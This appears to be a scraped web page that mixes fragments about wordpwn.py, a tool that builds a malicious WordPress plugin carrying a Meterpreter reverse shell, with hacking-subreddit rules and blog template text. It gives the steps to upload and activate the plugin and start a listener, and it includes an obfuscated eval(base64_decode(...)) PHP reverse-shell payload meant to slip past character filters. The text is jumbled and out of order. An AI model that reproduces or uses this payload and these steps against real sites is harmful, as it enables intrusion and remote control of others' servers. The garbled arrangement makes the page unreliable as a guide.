![]() Rob Carr is the author of the Metasploit module wp_admin_shell_upload, which this script is based on. I want to be 100% sure that I give credit to Rob Carr. Note: if the script usage is still a mystery to you, JavaRockstar has made a tutorial on his website HackingVision about it.Once the plugin installed and activated, just navigate to the following URLs to launch the reverse shell : Upload this zip file as a new plugin (by browsing to the URL Once uploaded, you have to activate the plugin.īe sure to start our listener (if you didn't specify the handler with the Y option) ! ![]() since by default the plugin will be made using a php/meterpreter/reverse_tcp reverse shell.If you have your own nefarious PHP payload simply adjust the script to accept it.Īfter the script is ran, a zip file (the plugin) called malicious.zip will be created in the current directory (and a handler will be started if you specified it with the Y option). You are also given the option to start a handler, I recommend that you do. Usage is super simple, simply pass wordpwn your listening address and listening port and execute the script. ![]() Usage: wordpwn.py Įxample: wordpwn.py 192.168.0.6 8888 Y How and When do I use this? Useful if you're exploiting a PHP injection vulnerability with character restrictions.\ \ / \ / / _ \| _/ _ | _ \ \ / \ / / _ \ eval(base64_decode(3V0ID0gJyc7CiAgICAgICAgaWYoc3Vic3RyKCRjLDAsMykgPT0gJ2NkICcpewogICAgICAgICAgY2hkaXIoc3Vic3RyKCRjLDMsLTEpKTsKICAgICAgICB9IGVsc2UgaWYgKHN1YnN0cigkYywwLDQpID09ICdxdWl0JyB8fCBzdWJzdHIoJGMsMCw0KSA9PSAnZXhpdCcpIHsKICAgICAgICAgIGJyZWFrOwogICAgICAgIH1lbHNlewogICAgICAgICAgJG91dD1JSGhHZEhMQVhhKHN1YnN0cigkYywwLC0xKSk7CiAgICAgICAgICBpZigkb3V0PT09ZmFsc2UpewogICAgICAgICAgICBmd3JpdGUoJHMsJG5vZnVuY3MpOwogICAgICAgICAgICBicmVhazsKICAgICAgICAgIH0KICAgICAgICB9CiAgICAgICAgZndyaXRlKCRzLCRvdXQpOwogICAgICB9CiAgICAgIGZjbG9zZSgkcyk7CiAgICB9ZWxzZXsKICAgICAgJHM9QHNvY2tldF9jcmVhdGUoQUZfSU5FVCxTT0NLX1NUUkVBTSxTT0xfVENQKTsKICAgICAgQHNvY2tldF9jb25uZWN0KCRzLCRpcGFkZHIsJHBvcnQpOwogICAgICBAc29ja2V0X3dyaXRlKCRzLCJzb2NrZXRfY3JlYXRlIik7CiAgICAgIHdoaWxlKCRjPUBzb2NrZXRfcmVhZCgkcywyMDQ4KSl7CiAgICAgICAgJG91dCA9ICcnOwogICAgICAgIGlmKHN1YnN0cigkYywwLDMpID09ICdjZCAnKXsKICAgICAgICAgIGNoZGlyKHN1YnN0cigkYywzLC0xKSk7CiAgICAgICAgfSBlb.HNlIGlmIChzdWJzdHIoJGMsMCw0KSA9PSAncXVpdCcgfHwgc3Vic3RyKCRjLDAsNCkgPT0gJ2V4aXQnKSB7CiAgICAgICAgICBicmVhazsKICAgICAgICB9ZWxzZXsKICAgICAgICAgICRvdXQ9SUhoR2RITEFYYShzdWJzdHIoJGMsMCwtMSkpOwogICAgICAgICAgaWYoJG91dD09PWZhbHNlKXsKICAgICAgICAgICAgQHNvY2tldF93cml0ZSgkcywkbm9mdW5jcyk7CiAgICAgICAgICAgIGJyZWFrOwogICAgICAgICAgfQogICAgICAgIH0KICAgICAgICBAc29ja2V0X3dyaXRlKCRzLCRvdXQsc3RybGVuKCRvdXQpKTsKICAgICAgfQogICAgICBAc29ja2V0X2Nsb3NlKCRzKTsKICAgIH0K)) Will generate a payload that looks like this. This also applies to PHP payloads as well, banning double quotes for a PHP payload will generate the payload in (almost all, sometimes it isn't fully) base64. Most of you are probably aware that when you're generating standard payloads (say a linux reverse shell) you can block certain hex values in your payload. Play nice, support each other and encourage learning. We are not tech support, these posts should be kept on /r/techsupportĭon't be a dick. Low-effort content will be removed at moderator discretion from security firms/pen testing companies is allowed within the confines of site-wide rules on self promotion found here, but will otherwise be considered spam. Spam is strictly forbidden and will result in a ban. Sharing of personal data is forbidden - no doxxing or IP dumping No "I got hacked" posts unless it's an interesting post-mortem of a unique attack. "How does HSTS prevent SSL stripping?" is a good question. Intermediate questions are welcomed - e.g. Offering to do these things will also result in a ban.Asking how to get into your "girlfriend's" instagram.This is not the place to try to find hackers to do your dirty work and you will be banned for trying. Discussion around the legality of issues is ok, encouraging or aiding illegal activities is not Hacking can be a grey area but keep it above board. "TeenagerĪrrested in Computer Crime Scandal", "Hacker Arrested after Bank Tampering". Guides and tutorials are welcome here as long as they are suitably complex and most importantly legal!īans are handed out at moderator discretion.Īnother one got caught today, it's all over the papers. This sub is aimed at those with an understanding of hacking - please visit /r/HowToHack for posting beginner links and tutorials any beginner questions should be directed there as they will result in a ban here. ![]() What we are about: quality and constructive discussion about the culture, profession and love of hacking. A subreddit dedicated to hacking and hacking culture.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |